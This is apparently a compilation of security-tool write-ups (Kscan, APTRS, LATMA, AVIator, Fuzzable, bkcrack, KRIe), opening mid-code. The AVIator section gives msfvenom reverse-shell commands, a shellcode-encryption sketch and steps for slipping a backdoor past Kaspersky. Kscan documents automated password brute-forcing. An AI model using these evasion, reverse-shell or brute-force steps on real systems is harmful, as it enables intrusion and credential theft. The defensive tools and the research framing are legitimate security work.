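        if banner[:3] in (b"220", b"250"):
            return "ftp/smtp-like"
        if not banner:                     # silent service: try an HTTP probe
            s.sendall(b"GET / HTTP/1.0\r\n\r\n")
            try:
                if s.recv(1024).startswith(b"HTTP/"):
                    return "http"
            except socket.timeout:
                pass
        return "unknown"

print(identify("www.baidu.com", 80))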

3 Compilation Manual

Compiler Manual

4 Get started

Kscan currently has 3 ways to input targets

  • -t/--target can add the --check parameter to fingerprint only the specified target ports; otherwise the target will be port-scanned and fingerprinted
IP address: 114.114.114.114
IP address range: 114.114.114.114-115.115.115.115
URL address: https://www.baidu.com
File address: file:/tmp/target.txt
  • --spy can add the --scan parameter to perform port scanning and fingerprinting on the surviving C segments; otherwise only surviving network segments will be detected
[Empty]: will detect the IP address of the local machine and probe the B segment where the local IP is located
[all]: all private network addresses (192.168/172.16/10, etc.) will be probed
IP address: will probe the B segment where the specified IP address is located
  • -f/--fofa can add --check to verify the survivability of the retrieval results, and add the --scan parameter to perform port scanning and fingerprint identification on the retrieval results; otherwise only the fofa retrieval results will be returned
fofa search keywords: will directly return fofa search results

5 Instructions

usage: kscan [-h,--help,--fofa-syntax] (-t,--target,-f,--fofa,--spy) [-p,--port|--top] [-o,--output] [-oJ] [--proxy] [--threads] [--path] [--host] [--timeout] [-Pn] [-Cn] [-sV] [--check] [--encoding] [--hydra] [hydra options] [fofa options]


optional arguments:
-h , --help show this help message and exit
-f , --fofa Get the detection object from fofa, you need to configure the environment variables in advance: FOFA_EMAIL, FOFA_KEY
-t , --target Specify the detection target:
IP address: 114.114.114.114
IP address segment: 114.114.114.114/24, subnet mask less than 12 is not recommended
IP address range: 114.114.114.114-115.115.115.115
URL address: https://www.baidu.com
File address: file:/tmp/target.txt
--spy network segment detection mode, in this mode, the internal network segment reachable by the host will be automatically detected. The acceptable parameters are:
(empty), 192, 10, 172, all, specified IP address (the IP address B segment will be detected as the surviving gateway)
--check only fingerprint the target address; port scanning will not be performed
--scan will perform port scanning and fingerprinting on the target objects provided by --fofa and --spy
-p , --port scan the specified port, TOP400 will be scanned by default, support: 80, 8080, 8088-8090
-eP, --excluded-port skip scanning specified ports, support: 80,8080,8088-8090
-o , --output save scan results to file
-oJ save the scan results to a file in json format
-Pn With this parameter, intelligent survivability detection will not be performed (it is enabled by default to improve efficiency).
-Cn With this parameter, the console output will not be colored.
-sV With this parameter, all ports will be probed with full probes. This greatly affects efficiency, so use it with caution!
--top Scan the filtered common ports TopX, up to 1000, the default is TOP400
--proxy set proxy (socks5|socks4|https|http)://IP:Port
--threads thread parameter, the default thread is 100, the maximum value is 2048
--path specifies the directory to request access, only a single directory is supported
--host specifies the header Host value for all requests
--timeout set timeout
--encoding Set the terminal output encoding, which can be specified as: gb2312, utf-8
--match returns the banner to the asset for retrieval. If there is a keyword, it will be displayed, otherwise it will not be displayed
--hydra automatic brute force; supported protocols: ssh, rdp, ftp, smb, mysql, mssql, oracle, postgresql, mongodb, redis, all enabled by default
hydra options:
--hydra-user custom hydra brute-force username: username or user1,user2 or file:username.txt
--hydra-pass custom hydra brute-force password: password or pass1,pass2 or file:password.txt
If there is a comma in the password, escape it with \, ; other symbols do not need to be escaped
--hydra-update append mode for custom usernames and passwords: if this parameter is present, the custom usernames and passwords are added to the default dictionary; otherwise the default dictionary is replaced
--hydra-mod specifies the automatic brute-force module(s): rdp or rdp,ssh,smb
fofa options:
--fofa-syntax will get fofa search syntax description
--fofa-size will set the number of entries returned by fofa, the default is 100
--fofa-fix-keyword Modifies the keyword, and the {} in this parameter will eventually be replaced with the value of the -f parameter

The functionality is not complicated; explore the rest yourself.

6 Demo

6.1 Port Scan Mode

6.2 Survival network segment detection

6.3 Fofa result retrieval

6.4 Brute-force cracking

6.5 CDN identification



MIMEDefang Email Scanner 3.3

MIMEDefang is a flexible MIME email scanner designed to protect Windows clients from viruses. Includes the ability to do many other kinds of mail processing, such as replacing parts of messages with URLs. It can alter or delete various parts of a MIME message according to a very flexible configuration file. It can also bounce messages with unacceptable attachments. MIMEDefang works with the Sendmail 8.11 and newer "Milter" API, which makes it more flexible and efficient than procmail-based approaches.

APTRS - Automated Penetration Testing Reporting System


APTRS (Automated Penetration Testing Reporting System) is an automated reporting tool written in Python and Django. The tool allows penetration testers to create a report directly, without using a traditional Docx file. It also provides an approach to keeping track of projects and vulnerabilities.


Documentation

Documentation

Prerequisites

Installation

The tool has been tested using Python 3.8.10 on Kali Linux 2022.2/3, Ubuntu 20.04.5 LTS, and Windows 10/11.

Windows Installation

  git clone https://github.com/Anof-cyber/APTRS.git
cd APTRS
install.bat

Linux Installation

  git clone https://github.com/Anof-cyber/APTRS.git
cd APTRS
install.sh

Running

Windows

  run.bat

Linux

  run.sh

Features

  • Demo Report
  • Managing Vulnerabilities
  • Manage All Projects in one place
  • Create a Vulnerability Database and avoid writing the same description and recommendations again
  • Easily Create PDF Report
  • Dynamically add POC, Description and Recommendations
  • Manage Customers and Companies

Screenshots

Project

View Project

Project Vulnerability

Project Report

Project Add Vulnerability

Roadmap

  • Improving Report Quality
  • Bulk Instance Upload
  • Pentest Mapper Burp Suite Extension Integration
  • Allowing Multiple Project Scope
  • Improving Code, Error handling and Security
  • Docker Support
  • Implementing Rest API
  • Project and Project Retest Handler
  • Access Control and Authorization
  • Support Nessus Parsing

Authors



LATMA - Lateral Movement Analyzer Tool


Lateral movement analyzer (LATMA) collects authentication logs from the domain and searches for potential lateral movement attacks and suspicious activity. The tool visualizes the findings with diagrams depicting the lateral movement patterns. The tool contains two modules, one that collects the logs and one that analyzes them. You can execute each module separately; the event log collector must be executed on a Windows machine in an Active Directory domain environment with Python 3.8 or above, while the analyzer can be executed on either a Linux or a Windows machine.


The Collector

The Event Log Collector module scans domain controllers for successful NTLM authentication logs and endpoints for successful Kerberos authentication logs. It requires access to LDAP/S ports 389 and 636 and RPC port 135 on the domain controller and clients. In addition, it requires domain admin privileges, a user in the Event Log Readers group, or one with equivalent permissions. This is required to pull event logs from all endpoints and domain controllers.

The collector gathers NTLM logs from event 8004 on the domain controllers and Kerberos logs from event 4648 on the clients. Its output is a comma-delimited CSV file with all the available authentication traffic. The output contains the fields source host, destination, username, auth type, SPN and timestamps in the format %Y/%m/%d %H:%M. The collector requires credentials of a valid user with event viewer privileges across the environment and queries the specific logs for each protocol. A sketch of this row format follows.
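
The sketch below writes one row in the documented output shape (comma-delimited, with source host, destination, username, auth type, SPN and a %Y/%m/%d %H:%M timestamp). The header names are illustrative assumptions, not necessarily LATMA's exact column titles.

import csv
from datetime import datetime

row = {
    "source host": "WS01",
    "destination": "DC1",
    "username": "eddard.stark",
    "auth type": "Kerberos",
    "SPN": "termsrv/DC1",
    "timestamp": datetime.now().strftime("%Y/%m/%d %H:%M"),
}

with open("logs.csv", "w", newline="") as f:
    writer = csv.DictWriter(f, fieldnames=list(row))
    writer.writeheader()
    writer.writerow(row)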

Verify Kerberos and NTLM protocols are audited across the environment using group policy:

  1. Kerberos - Computer configuration -> policies -> Windows Settings -> Security settings -> Local policies -> Audit Policies -> audit account logon events
  2. NTLM - Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Local Policies -> Security Options -> Network Security: Restrict NTLM: audit NTLM authentication in this domain

The Analyzer

The Analyzer receives as input a spreadsheet with authentication data formatted as specified in the Collector's output structure. It searches for suspicious activity with the lateral movement analyzer algorithm and also detects additional IoCs of lateral movement. The authentication source and destination should be given as NetBIOS names, not IP addresses.

Preliminaries and key concepts of the LATMA algorithm

LATMA gets a batch of authentication requests and sends an alert when it finds suspicious lateral movement attacks. We define the following:

  • Authentication Graph: A directed graph that contains information about authentication traffic in the environment. The nodes of the graphs are computers, and the edges are authentications between the computers. The graph edges have the attributes: protocol type, date of authentication and the account that sent the request. The graph nodes contain information about the computer it represents, detailed below.

  • Lateral movement graph: A sub-graph of the authentication graph that represents the attacker’s movement. The lateral movement graph is not always a path in the sub-graph; in some attacks the attacker moves in many different directions.

  • Alert: A sub-graph that the algorithm suspects is part of the lateral movement graph.

LATMA performs several actions during its execution:

  • Information gathering: LATMA monitors normal behavior of the users and machines and characterizes them. The learning is used later to decide which authentication requests deviate from a normal behavior and might be involved in a lateral movement attack. For a learning period of three weeks LATMA does not throw any alerts and only learns the environment. The learning continues after those three weeks.

  • Authentication graph building: After the learning period every relevant authentication is added to the authentication graph. It is critical to filter only for relevant authentication, otherwise the number of edges the graph holds might be too big. We filter on the following protocol types: NTLM and Kerberos with the services β€œrpc”, β€œrpcss” and β€œtermsrv.”

Alert handling:

Adding an authentication to the graph might trigger a process of alerting. In general, a new edge can create a new alert, join an existing alert or merge two alerts.

Information gathering

Every authentication request monitored by LATMA is used for learning and stored in a dedicated data structure. First, we identify sinks and hubs. We define sinks as machines accessed by many (at least 50) different accounts, such as a company portal or exchange server. We define hubs as machines many different accounts (at least 20) authenticate from, such as proxies and VPNs. Authentications to sinks or from hubs are considered benign and are therefore removed from the authentication graph.

In addition to basic classification, LATMA matches between accounts and machines they frequently authenticate from. If an account authenticates from a machine at least three different days in a three weeks’ period, it means that this account matches the machine and any authentication of this account from the machine is considered benign and removed from the authentication graph.
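
A minimal sketch of this sink/hub classification, using the documented thresholds (at least 50 accounts into a sink, at least 20 accounts out of a hub) and the illustrative CSV shape from the collector section above; LATMA's real data structures are richer than this.

import csv
from collections import defaultdict

SINK_THRESHOLD, HUB_THRESHOLD = 50, 20

accounts_into = defaultdict(set)   # destination -> accounts authenticating to it
accounts_from = defaultdict(set)   # source -> accounts authenticating from it

with open("logs.csv") as f:
    for row in csv.DictReader(f):
        accounts_into[row["destination"]].add(row["username"])
        accounts_from[row["source host"]].add(row["username"])

sinks = {m for m, accs in accounts_into.items() if len(accs) >= SINK_THRESHOLD}
hubs = {m for m, accs in accounts_from.items() if len(accs) >= HUB_THRESHOLD}

def is_benign(row) -> bool:
    # Authentications to sinks or from hubs are dropped from the graph.
    return row["destination"] in sinks or row["source host"] in hubs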

The lateral movement IoCs are:

White cane - User accounts authenticating from a single machine to multiple ones in a relatively short time.

Bridge - User account X authenticating from machine A to machine B and following that, from machine B to machine C. This IoC potentially indicates an attacker performing actual advance from its initial foothold (A) to destination machine that better serves the attack’s objectives.

Switched Bridge - User account X authenticating from machine A to machine B, followed by user account Y authenticating from machine B to machine C. This IoC potentially indicates an attacker that discovers and compromises an additional account along its path and uses the new account to advance forward (a common example is account X being a standard domain user and account Y being an admin user).

Weight Shift - White cane (see above) from machine A to machines {B1,…, Bn}, followed by another White cane from machine Bx to machines {C1,…,Cn}. This IoC potentially indicates an attacker that has determined that machine B would better serve the attack’s purposes and from now on uses machine B as the source for additional searches.

Blast - User account X authenticating from machine A to multiple machines in a very short timeframe. A common example is an attacker that plants/executes ransomware on a massive number of machines simultaneously.

Output:

The analyzer outputs several different files

  1. A spreadsheet with all the suspected authentications (all_authentications.csv) and their role classification and a different spreadsheet for the authentications that are suspected to be part of lateral movement (propagation.csv)
  2. A GIF file representing the progression, whereby each frame of the GIF specifies exactly what the suspicious action was
  3. An interactive timeline with all the suspicious events. Events that are related to each other have the same color

Dependencies:

  1. Python 3.8
  2. libraries as follows in requirements.txt
  3. Run pip install . for running setup automatically
  4. Audit Kerberos and NTLM across the environment
  5. LDAP queries to the domain controllers
  6. Domain admin credentials or any credentials with MS-EVEN6 remote event viewer permissions.

Usage

The Collector

Required arguments:

  1. credentials [domain.com/]username[:password] credentials format; alternatively [domain.com/]username, and then the password will be prompted for securely. For the domain, please insert the FQDN (Fully Qualified Domain Name).

Optional arguments:
  2. -ntlm Retrieve ntlm authentication logs from DC
  3. -kerberos Retrieve kerberos authentication logs from all computers in the domain
  4. -debug Turn DEBUG output ON
  5. -help show this help message and exit
  6. -filter Query specific ou or container in the domain, will result all workstations in the sub-OU as well. Each OU will be in format of DN (Distinguished Name). Supports multiple OUs with a semicolon delimiter. Example: OU=subunit,OU=unit;OU=anotherUnit,DC=domain,DC=com Example: CN=container,OU=unit;OU=anotherUnit,DC=domain,DC=com
  7. -date Starting date to collect event logs from. month-day-year format, if not specified take all available data
  8. -threads amount of working threads to use
  9. -ldap Use Unsecure LDAP instead of LDAP/S
  10. -ldap_domain Custom domain on ldap login credentials. If empty, will use current user's session domain

The Analyzer

Required arguments:

  1. authentication_file authentication file should contain list of NTLM and Kerberos requests

Optional arguments:

  2. -output_file The location the csv with all the IoCs is going to be saved to
  3. -progression_output_file The location the csv with the IoCs of the lateral movements is going to be saved to
  4. -sink_threshold Number of accounts from which a machine is considered a sink, default is 50
  5. -hub_threshold Number of accounts from which a machine is considered a hub, default is 20
  6. -learning_period Learning period in days, default is 7 days
  7. -show_all_iocs Show IoCs that are not connected to any other IoCs
  8. -show_gant If true, output the events in a Gantt format

Binary Usage: Open a command prompt and navigate to the binary folder. Run the executables with the arguments specified above.

Examples

In the example files you have several samples of real environments (some contain lateral movement attacks and some don't) which you can give as input for the analyzer.

Usage example

  1. python eventlogcollector.py domain.com/username:password -ntlm -kerberos
  2. python analyzer.py logs.csv


AVIator - Antivirus Evasion Project


AviAtor ported to .NET Core 5 with an updated UI


AV|Ator

About://name

AV: AntiVirus

Ator: Is a swordsman, alchemist, scientist, magician, scholar, and engineer, with the ability to sometimes produce objects out of thin air (https://en.wikipedia.org/wiki/Ator)

About://purpose

AV|Ator is a backdoor generator utility, which uses cryptographic and injection techniques in order to bypass AV detection. More specifically:

  • It uses AES encryption in order to encrypt a given shellcode
  • Generates an executable file which contains the encrypted payload
  • The shellcode is decrypted and injected to the target system using various injection techniques

[https://attack.mitre.org/techniques/T1055/]:

  1. Portable executable injection which involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue.

  2. Thread execution hijacking which involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.


Usage

The application has a form which consists of three main inputs (see the screenshot below):

  1. A text containing the encryption key used to encrypt the shellcode
  2. A text containing the IV used for AES encryption
  3. A text containing the shellcode

Important note: The shellcode should be provided as a C# byte array.

The default values contain shellcode that executes notepad.exe (32bit). This demo is provided as an indication of how the code should be formed (using msfvenom, this can be easily done with the -f csharp switch, e.g. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).
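
For illustration, the preparation step can be sketched in Python: AES-encrypt raw shellcode and print it as a C# byte array. This mirrors the idea only; it is not AV|Ator's exact key handling, the key/IV are placeholders for inputs 1 and 2 above, and pycryptodome is assumed to be installed.

from Crypto.Cipher import AES          # pip install pycryptodome
from Crypto.Util.Padding import pad

key = b"0123456789abcdef"              # placeholder 16-byte AES key
iv = b"fedcba9876543210"               # placeholder 16-byte IV
shellcode = open("shellcode.bin", "rb").read()  # raw msfvenom output (-f raw)

cipher = AES.new(key, AES.MODE_CBC, iv)
encrypted = cipher.encrypt(pad(shellcode, AES.block_size))

# Emit the encrypted payload in the C# byte-array form the tool expects.
csharp = ", ".join(f"0x{b:02x}" for b in encrypted)
print(f"byte[] buf = new byte[{len(encrypted)}] {{ {csharp} }};")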

After filling the provided inputs and selecting the output path an executable is generated according to the chosen options.

RTLO option

In simple words, it spoofs an executable file so it appears to have an "innocent" extension like 'pdf', 'txt', etc. E.g. the file "testcod.exe" will be displayed as "tesexe.doc".

Beware of the fact that some AVs flag the spoofing itself as malware.
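
A tiny demonstration of the trick: the Unicode right-to-left override character (U+202E) makes everything after it render reversed, so "cod.exe" displays as "exe.doc" while the file still ends in .exe.

name = "tes" + "\u202e" + "cod.exe"
print(name)        # renders as "tesexe.doc" in RTL-aware UIs
print(repr(name))  # the underlying name still ends in .exe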

Set custom icon

I guess you all know what it is :)

Bypassing Kaspersky AV on a Win 10 x64 host (TEST CASE)

Getting a shell on a Windows 10 machine running fully updated Kaspersky AV

Target Machine: Windows 10 x64

  1. Create the payload using msfvenom

    msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

  2. Use AVIator with the following settings

    Target OS architecture: x64

    Injection Technique: Thread Hijacking (Shellcode Arch: x64, OS arch: x64)

    Target procedure: explorer (leave the default)

  3. Set the listener on the attacker machine

  4. Run the generated exe on the victim machine

Installation

Windows:

Either compile the project or download the already compiled executable from the following folder:

https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries

Linux:

Install Mono according to your linux distribution, download and run the binaries

e.g. in kali:

   root@kali# apt install mono-devel 

root@kali# mono aviator.exe

Credits

To Damon Mohammadbagher for the encryption procedure

Disclaimer

I developed this app in order to overcome the demanding challenges of the pentest process and this is the ONLY WAY that this app should be used. Make sure that you have the required permission to use it against a system and never use it for illegal purposes.



Fuzzable - Framework For Automating Fuzzable Target Discovery With Static Analysis


Framework for Automating Fuzzable Target Discovery with Static Analysis.

Introduction

Vulnerability researchers conducting security assessments on software will often harness the capabilities of coverage-guided fuzzing through powerful tools like AFL++ and libFuzzer. This is important as it automates the bughunting process and reveals exploitable conditions in targets quickly. However, when encountering large and complex codebases or closed-source binaries, researchers have to painstakingly dedicate time to manually audit and reverse engineer them to identify functions where fuzzing-based exploration can be useful.

Fuzzable is a framework that integrates both with C/C++ source code and binaries to assist vulnerability researchers in identifying function targets that are viable for fuzzing. This is done by applying several static analysis-based heuristics to pinpoint risky behaviors in the software and the functions that execute them. Researchers can then utilize the framework to generate basic harness templates, which can then be used to hunt for vulnerabilities, or be integrated as part of a continuous fuzzing pipeline, such as Google's oss-fuzz project.

In addition to running as a standalone tool, Fuzzable is also integrated as a plugin for the Binary Ninja disassembler, with support for other disassembly backends being developed.

Check out the original blog post detailing the tool here, which highlights the technical specifications of the static analysis heuristics and how this tool came about. This tool is also featured at Black Hat Arsenal USA 2022.


Features

  • Supports analyzing binaries (with Angr and Binary Ninja) and source code artifacts (with tree-sitter).
  • Run static analysis both as a standalone CLI tool or a Binary Ninja plugin.
  • Harness generation to ramp up on creating fuzzing campaigns quickly.

Installation

Some binary targets may require some sanitizing (ie. signature matching, or identifying functions from inlining), and therefore fuzzable primarily uses Binary Ninja as a disassembly backend because of its ability to effectively solve these problems. It can thus be utilized both as a standalone tool and as a plugin.

Since Binary Ninja isn't accessible to all, and there may be a demand to utilize the tool for security assessments and potentially scale it up in the cloud, an angr fallback backend is also supported. I anticipate incorporating other disassemblers down the road as well (priority: Ghidra).

Command Line (Standalone)

If you have Binary Ninja Commercial, be sure to install the API for standalone headless usage:

$ python3 /Applications/Binary\ Ninja.app/Contents/Resources/scripts/install_api.py

Install with pip:

$ pip install fuzzable

Manual/Development Build

We use poetry for dependency management and building. To do a manual build, clone the repository with the third-party modules:

$ git clone --recursive https://github.com/ex0dus-0x/fuzzable

To install manually:

$ cd fuzzable/

# without poetry
$ pip install .

# with poetry
$ poetry install

# with poetry for a development virtualenv
$ poetry shell

You can now analyze binaries and/or source code with the tool!

# analyzing a single shared object library binary
$ fuzzable analyze examples/binaries/libbasic.so

# analyzing a single C source file
$ fuzzable analyze examples/source/libbasic.c

# analyzing a workspace with multiple C/C++ files and headers
$ fuzzable analyze examples/source/source_bundle/

Binary Ninja Plugin

fuzzable can be easily installed through the Binary Ninja plugin marketplace by going to Binary Ninja > Manage Plugins and searching for it. Here is an example of the fuzzable plugin running, accurately identifying targets for fuzzing and further vulnerability assessment:

Usage

fuzzable comes with various options to help better tune your analysis. More will be supported in the future, along with any feature requests made.

Static Analysis Heuristics

To determine fuzzability, fuzzable utilizes several heuristics to determine which targets are the most viable for dynamic analysis. These heuristics are all weighted differently using the scikit-criteria library, which applies multi-criteria decision analysis to determine the best candidates. These metrics and their weights can be seen here:

Heuristic Description Weight
Fuzz Friendly Name Symbol name implies behavior that ingests file/buffer input 0.3
Risky Sinks Arguments that flow into risky calls (ie memcpy) 0.3
Natural Loops Number of loops detected with the dominance frontier 0.05
Cyclomatic Complexity Complexity of function target based on edges + nodes 0.05
Coverage Depth Number of callees the target traverses into 0.3

As mentioned, check out the technical blog post for a more in-depth look into why and how these metrics are utilized.

Many metrics were largely inspired by Vincenzo Iozzo's original work in 0-knowledge fuzzing.
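
As a back-of-the-envelope illustration, the sketch below scores candidates with a plain weighted sum over normalized metric values using the weights from the table above. The real tool uses scikit-criteria for multi-criteria decision analysis, so treat this only as an approximation; the candidate data is made up.

WEIGHTS = {
    "fuzz_friendly_name": 0.3,
    "risky_sinks": 0.3,
    "natural_loops": 0.05,
    "cyclomatic_complexity": 0.05,
    "coverage_depth": 0.3,
}

def fuzzability(metrics: dict) -> float:
    # Metric values are assumed normalized to [0, 1] per candidate.
    return sum(WEIGHTS[name] * metrics.get(name, 0.0) for name in WEIGHTS)

candidates = {
    "parse_header": {"fuzz_friendly_name": 1.0, "risky_sinks": 0.8,
                     "natural_loops": 0.2, "cyclomatic_complexity": 0.4,
                     "coverage_depth": 0.6},
    "print_usage":  {"fuzz_friendly_name": 0.0, "risky_sinks": 0.0,
                     "natural_loops": 0.0, "cyclomatic_complexity": 0.1,
                     "coverage_depth": 0.1},
}

for name in sorted(candidates, key=lambda n: -fuzzability(candidates[n])):
    print(f"{name}: {fuzzability(candidates[name]):.2f}")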

Every target you want to analyze is diverse, and fuzzable will not be able to account for every edge-case behavior in the program target. Thus, it may be important during analysis to tune these weights appropriately to see if different results make more sense for your use case. To tune these weights in the CLI, simply specify the --score-weights argument:

$ fuzzable analyze <TARGET> --score-weights=0.2,0.2,0.2,0.2,0.2

Analysis Filtering

By default, fuzzable will filter out function targets based on the following criteria:

  • Top-level entry calls - functions that aren't called by any other calls in the target. These are ideal entry points that have potentially very high coverage.
  • Static calls - (source only) functions that are static and aren't exposed through headers.
  • Imports - (binary only) other library dependencies being used by the target's implementations.

To see calls that got filtered out by fuzzable, set the --list-ignored flag:

$ fuzzable analyze --list-ignored <TARGET>

In Binary Ninja, you can toggle this setting in Settings > Fuzzable > List Ignored Calls.

In the case that fuzzable falsely filters out important calls that should be analyzed, it is recommended to use --include-* arguments to include them during the run:

# include ALL non top-level calls that were filtered out
$ fuzzable analyze --include-nontop <TARGET>

# include specific symbols that were filtered out
$ fuzzable analyze --include-sym <SYM> <TARGET>

In Binary Ninja, this is supported through Settings > Fuzzable > Include non-top level calls and Symbols to Exclude.

Harness Generation

Now that you have found your ideal candidates to fuzz, fuzzable will also help you generate fuzzing harnesses that are (almost) ready to instrument and compile for use with either a file-based fuzzer (ie. AFL++, Honggfuzz) or in-memory fuzzer (libFuzzer). To do so in the CLI:

If this target is a source codebase, the generic source template will be used.

If the target is a binary, the generic black-box template will be used, which ideally can be used with a fuzzing emulation mode like AFL-QEMU. A copy of the binary will also be created as a shared object if the symbol isn't exported directly to be dlopened using LIEF.

At the moment, this feature is quite rudimentary: it simply creates a standalone C++ harness populated with the appropriate parameters, and will not auto-generate code needed for any runtime behaviors (ie. instantiating and freeing structures). However, the templates created by fuzzable should still get you running quickly. Here are some ambitious features I would like to implement down the road:

  • Full harness synthesis - harnesses will work directly with absolutely no manual changes needed.
  • Synthesis from potential unit tests using the DeepState framework (Source only).
  • Immediate deployment to a managed continuous fuzzing fleet.

Exporting Reports

fuzzable supports generating reports in various formats. The current ones that are supported are JSON, CSV and Markdown. This can be useful if you are utilizing this as part of automation where you would like to ingest the output in a serializable format.

In the CLI, simply pass the --export argument with a filename with the appropriate extension:

$ fuzzable analyze --export=report.json <TARGET>

In Binary Ninja, go to Plugins > Fuzzable > Export Fuzzability Report > ... and select the format you want to export to and the path you want to write it to.

Contributing

This tool will be continuously developed, and any help from external maintainers is appreciated!

  • Create an issue for feature requests or bugs that you have come across.
  • Submit a pull request for fixes and enhancements that you would like to see contributed to this tool.

License

Fuzzable is licensed under the MIT License.



tcpdump 4.99.3

tcpdump allows you to dump the traffic on a network. It can be used to print out the headers and/or contents of packets on a network interface that matches a given expression. You can use this tool to track down network problems, to detect many attacks, or to monitor the network activities.

Bkcrack - Crack Legacy Zip Encryption With Biham And Kocher's Known Plaintext Attack


Crack legacy zip encryption with Biham and Kocher's known plaintext attack.

Overview

A ZIP archive may contain many entries whose content can be compressed and/or encrypted. In particular, entries can be encrypted with a password-based symmetric encryption algorithm referred to as traditional PKWARE encryption, legacy encryption or ZipCrypto. This algorithm generates a pseudo-random stream of bytes (keystream) which is XORed to the entry's content (plaintext) to produce encrypted data (ciphertext). The generator's state, made of three 32-bit integers, is initialized using the password and then continuously updated with plaintext as encryption goes on. This encryption algorithm is vulnerable to known plaintext attacks, as shown by Eli Biham and Paul C. Kocher in the research paper A known plaintext attack on the PKZIP stream cipher. Given ciphertext and 12 or more bytes of the corresponding plaintext, the internal state of the keystream generator can be recovered. This internal state is enough to decipher the ciphertext entirely, as well as other entries which were encrypted with the same password. It can also be used to bruteforce the password with a complexity of n^(l-6), where n is the size of the character set and l is the length of the password. A sketch of the keystream generator follows.
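
Below is a minimal Python sketch of that keystream generator (the classic PKZIP cipher), using the well-known initial keys and multiplier; it shows how each plaintext byte feeds back into the three 32-bit keys. This is for understanding only; bkcrack implements the attack itself natively.

import zlib

MASK = 0xFFFFFFFF

def crc32_byte(crc: int, b: int) -> int:
    # Raw table-based CRC-32 update (no pre/post inversion), via zlib.
    return ~zlib.crc32(bytes([b]), ~crc & MASK) & MASK

class ZipCrypto:
    def __init__(self, password: bytes):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for c in password:
            self.update(c)

    def update(self, plain_byte: int) -> None:
        self.k0 = crc32_byte(self.k0, plain_byte)
        self.k1 = ((self.k1 + (self.k0 & 0xFF)) * 134775813 + 1) & MASK
        self.k2 = crc32_byte(self.k2, (self.k1 >> 24) & 0xFF)

    def stream_byte(self) -> int:
        t = (self.k2 | 3) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def decrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for c in data:
            p = c ^ self.stream_byte()
            self.update(p)   # the state is updated with each plaintext byte
            out.append(p)
        return bytes(out)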

bkcrack is a command-line tool which implements this known plaintext attack. The main features are:

  • Recover internal state from ciphertext and plaintext.
  • Change a ZIP archive's password using the internal state.
  • Recover the original password from the internal state.

Install

Precompiled packages

You can get the latest official release on GitHub.

Precompiled packages for Ubuntu, MacOS and Windows are available for download. Extract the downloaded archive wherever you like.

On Windows, Microsoft runtime libraries are needed for bkcrack to run. If they are not already installed on your system, download and install the latest Microsoft Visual C++ Redistributable package.

Compile from source

Alternatively, you can compile the project with CMake.

First, download the source files or clone the git repository. Then, running the following commands in the source tree will create an installation in the install folder.

cmake -S . -B build -DCMAKE_INSTALL_PREFIX=install
cmake --build build --config Release
cmake --build build --config Release --target install

Third-party packages

bkcrack is available in the package repositories listed on the right. Those packages are provided by external maintainers.

Usage

List entries

You can see a list of entry names and metadata in an archive named archive.zip like this:

bkcrack -L archive.zip

Entries using ZipCrypto encryption are vulnerable to a known-plaintext attack.

Recover internal keys

The attack requires at least 12 bytes of known plaintext. At least 8 of them must be contiguous. The larger the contiguous known plaintext, the faster the attack.

Load data from zip archives

Having a zip archive encrypted.zip with the entry cipher being the ciphertext and plain.zip with the entry plain as the known plaintext, bkcrack can be run like this:

bkcrack -C encrypted.zip -c cipher -P plain.zip -p plain

Load data from files

Having a file cipherfile with the ciphertext (starting with the 12 bytes corresponding to the encryption header) and plainfile with the known plaintext, bkcrack can be run like this:

bkcrack -c cipherfile -p plainfile

Offset

If the plaintext corresponds to a part other than the beginning of the ciphertext, you can specify an offset. It can be negative if the plaintext includes a part of the encryption header.

bkcrack -c cipherfile -p plainfile -o offset

Sparse plaintext

If you know only a small amount of contiguous plaintext (between 8 and 11 bytes), but know some bytes at other known offsets, you can provide this information to reach the requirement of 12 known bytes in total. To do so, use the -x flag followed by an offset and bytes in hexadecimal.

bkcrack -c cipherfile -p plainfile -x 25 4b4f -x 30 21

Number of threads

If bkcrack was built with parallel mode enabled, the number of threads used can be set through the environment variable OMP_NUM_THREADS.

Decipher

If the attack is successful, the deciphered data associated to the ciphertext used for the attack can be saved:

bkcrack -c cipherfile -p plainfile -d decipheredfile

If the keys are known from a previous attack, it is possible to use bkcrack to decipher data:

bkcrack -c cipherfile -k 12345678 23456789 34567890 -d decipheredfile

Decompress

The deciphered data might be compressed depending on whether compression was used or not when the zip file was created. If deflate compression was used, a Python 3 script provided in the tools folder may be used to decompress data.

python3 tools/inflate.py < decipheredfile > decompressedfile

Unlock encrypted archive

It is also possible to generate a new encrypted archive with the password of your choice:

bkcrack -C encrypted.zip -k 12345678 23456789 34567890 -U unlocked.zip password

The archive generated this way can be extracted using any zip file utility with the new password. It assumes that every entry was originally encrypted with the same password.

Recover password

Given the internal keys, bkcrack can try to find the original password. You can look for a password up to a given length using a given character set:

bkcrack -k 1ded830c 24454157 7213b8c5 -r 10 ?p

You can be more specific by specifying a minimal password length:

bkcrack -k 18f285c6 881f2169 b35d661d -r 11..13 ?p

Learn

A tutorial is provided in the example folder.

For more information, have a look at the documentation and read the source.

Contribute

Do not hesitate to suggest improvements or submit pull requests on GitHub.

License

This project is provided under the terms of the zlib/png license.



KRIe - Linux Kernel Runtime Integrity With eBPF


KRIe is a research project that aims to detect Linux Kernel exploits with eBPF. KRIe is far from being a bulletproof strategy: from eBPF related limitations to post exploitation detections that might rely on a compromised kernel to emit security events, it is clear that a motivated attacker will eventually be able to bypass it. That being said, the goal of the project is to make attackers' lives harder and ultimately prevent out-of-the-box exploits from working on a vulnerable kernel.

